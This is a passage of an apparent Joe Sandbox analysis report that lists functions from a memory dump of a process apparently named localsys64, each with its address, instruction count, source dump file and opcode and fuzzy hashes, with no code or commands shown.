                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 292af1399d88d23a321bfed6910be1236c46fb768725417b8425de46eca31d8b
                                                    • Instruction ID: 6a8b938c35f586e1821e07ffaaab3fcdbbe95fc0cee2d50c2623cfadf5e30601
                                                    • Opcode Fuzzy Hash: 292af1399d88d23a321bfed6910be1236c46fb768725417b8425de46eca31d8b
                                                    • Instruction Fuzzy Hash: 3431E321B18D480FEB98FB2C9869679A6C2EFDC705F0505BEE01EC32E7DD68AC418341
                                                    Function 00007FFD9B880AD1 Relevance: .1, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ec49549bce141d2f2e08f2c268ef0e35596a8bf72a069794fd51b687f6a85851
                                                    • Instruction ID: 4a467ba377f818e39410bd050f5bf06a8929359c175c20a2030edbc49cb5a874
                                                    • Opcode Fuzzy Hash: ec49549bce141d2f2e08f2c268ef0e35596a8bf72a069794fd51b687f6a85851
                                                    • Instruction Fuzzy Hash: 2A31E761B19A094FE759B7BC58297BC77D2EFD8611F0501B7E01DC32E6DD2868428351
                                                    Function 00007FFD9B8807D3 Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cfad36fb9510f06c03fc95ee154260b5b02fa1b3ccb4e342dc9d1493aae4bdfd
                                                    • Instruction ID: 113741a62fa2c344ddb4c2170481b91c2ce565f5ccd381ffcabdcfde90eb82fb
                                                    • Opcode Fuzzy Hash: cfad36fb9510f06c03fc95ee154260b5b02fa1b3ccb4e342dc9d1493aae4bdfd
                                                    • Instruction Fuzzy Hash: 36312B31B0AA4D5FD349E72C98B88E97F61EF8624478041F5D498C72DFDE3829428761
                                                    Function 00007FFD9B880985 Relevance: .1, Instructions: 114COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6b8abc07079f45efb077e036eaa3e60bafc13034b7414dfd88a905607e994319
                                                    • Instruction ID: 1df16d696fe91ce1828345b4eafab2e83c7799ab34221d2a66f4a07d00ea2ff4
                                                    • Opcode Fuzzy Hash: 6b8abc07079f45efb077e036eaa3e60bafc13034b7414dfd88a905607e994319
                                                    • Instruction Fuzzy Hash: 8131A430B19A0D8FEB48EBA8D8696ED77A2FF99300F540579D019D32CADE38A8418751
                                                    Function 00007FFD9B880845 Relevance: .1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9f7f983d947dc1565123db80a852cebd3c3ad8094269146fb4a1491b2aaa3775
                                                    • Instruction ID: ddfd997a491ddaa56f2a9ed2a654b7cfc8432b424f71eaebb1a4d10ab944a5c0
                                                    • Opcode Fuzzy Hash: 9f7f983d947dc1565123db80a852cebd3c3ad8094269146fb4a1491b2aaa3775
                                                    • Instruction Fuzzy Hash: 5D31D930B15A4D8FD38CFB6894B98E97B72EF8620878045B5D459C33DFDE3829428761
                                                    Function 00007FFD9B880860 Relevance: .1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 94b83c4219f77eb31bbae56538be8cdc21073c2479004d2b6b4178eba6fe50f9
                                                    • Instruction ID: 8c9e50c57f0b280f2629124f9592d3fa36a1daad64bd09f21711c837d2b8ae8e
                                                    • Opcode Fuzzy Hash: 94b83c4219f77eb31bbae56538be8cdc21073c2479004d2b6b4178eba6fe50f9
                                                    • Instruction Fuzzy Hash: 87219B30B15A4D8FD38CF76894AC9E97B72EF8A204BC044A5D859D33DEDE3865018761
                                                    Function 00007FFD9B881E11 Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b58ceea0aaf6610f76844fe976d3f77f97c15b77ec56e4851f70b25b60a33f5
                                                    • Instruction ID: 58a153983a6636f3d46f7050d4ce9292d0ecf221469deaa53f6583b32ab86482
                                                    • Opcode Fuzzy Hash: 7b58ceea0aaf6610f76844fe976d3f77f97c15b77ec56e4851f70b25b60a33f5
                                                    • Instruction Fuzzy Hash: 77017B10A0EE890FE795737818A84717FE0CF8A300B0900BAE898C70A7DD186B418382